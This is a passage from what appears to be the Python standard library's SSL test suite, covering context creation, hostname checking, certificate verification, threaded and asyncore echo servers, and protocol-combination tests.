ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen(5)
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class NetworkedTests(unittest.TestCase):
def test_connect(self):
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE)
try:
s.connect(("svn.python.org", 443))
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# this should fail because we have no verification certs
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, ("svn.python.org", 443))
s.close()
# this should succeed because we specify the root cert
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
s.connect(("svn.python.org", 443))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
self.assertEqual(0, s.connect_ex(("svn.python.org", 443)))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.setblocking(False)
rc = s.connect_ex(('svn.python.org', 443))
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.settimeout(0.0000001)
rc = s.connect_ex(('svn.python.org', 443))
if rc == 0:
self.skipTest("svn.python.org responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_ex_error(self):
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
rc = s.connect_ex(("svn.python.org", 444))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
self.assertIn(rc, (errno.ECONNREFUSED, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_with_context(self):
with support.transient_internet("svn.python.org"):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# Same with a server hostname
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="svn.python.org")
s.connect(("svn.python.org", 443))
s.close()
# This should fail because we have no verification certs
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, ("svn.python.org", 443))
s.close()
# This should succeed because we specify the root cert
ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
with support.transient_internet("svn.python.org"):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_cadata(self):
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
with support.transient_internet("svn.python.org"):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(("svn.python.org", 443))
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(("svn.python.org", 443))
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
with support.transient_internet("svn.python.org"):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
ss.connect(("svn.python.org", 443))
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
with support.transient_internet("svn.python.org"):
s = socket.socket(socket.AF_INET)
s.connect(("svn.python.org", 443))
s.setblocking(False)
s = ssl.wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
s.close()
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
def _test_get_server_certificate(host, port, cert=None):
with support.transient_internet(host):
pem = ssl.get_server_certificate((host, port),
ssl.PROTOCOL_SSLv23)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
try:
pem = ssl.get_server_certificate((host, port),
ssl.PROTOCOL_SSLv23,
ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
self.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
pem = ssl.get_server_certificate((host, port),
ssl.PROTOCOL_SSLv23,
ca_certs=cert)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
_test_get_server_certificate('svn.python.org', 443, SVN_PYTHON_ORG_ROOT_CERT)
if support.IPV6_ENABLED:
_test_get_server_certificate('ipv6.google.com', 443)
def test_ciphers(self):
remote = ("svn.python.org", 443)
with support.transient_internet(remote[0]):
with ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(remote)
with ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(remote)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = ssl.wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(remote)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI:
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
with support.transient_internet("svn.python.org"):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
with support.transient_internet("svn.python.org"):
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s) as ss:
ss.connect(("svn.python.org", 443))
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_protocols.append(self.sslconn.selected_npn_protocol())
except (ssl.SSLError, ConnectionResetError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_protocols = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler (asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = ssl.wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def bad_cert_test(certfile):
"""
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with the given client certificate fails.
"""
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server:
try:
with socket.socket() as sock:
s = ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
except ssl.SSLError as x:
if support.verbose:
sys.stdout.write("\nSSLError is %s\n" % x.args[1])
except OSError as x:
if support.verbose:
sys.stdout.write("\nOSError is %s\n" % x.args[1])
except OSError as x:
if x.errno != errno.ENOENT:
raise
if support.verbose:
sys.stdout.write("\OSError is %s\n" % str(x))
else:
raise AssertionError("Use of invalid cert should have failed!")
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_npn_protocol': s.selected_npn_protocol()
})
s.close()
stats['server_npn_protocols'] = server.selected_protocols
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="localhost") as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(ssl.CertificateError,
"hostname 'invalid' doesn't match 'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_empty_cert(self):
"""Connecting with an empty cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"nullcert.pem"))
def test_malformed_cert(self):
"""Connecting with a badly formatted certificate (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badcert.pem"))
def test_nonexisting_cert(self):
"""Connecting with a non-existing cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem"))
def test_malformed_key(self):
"""Connecting with a badly formatted key (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badkey.pem"))
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen(5)
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = ssl.wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
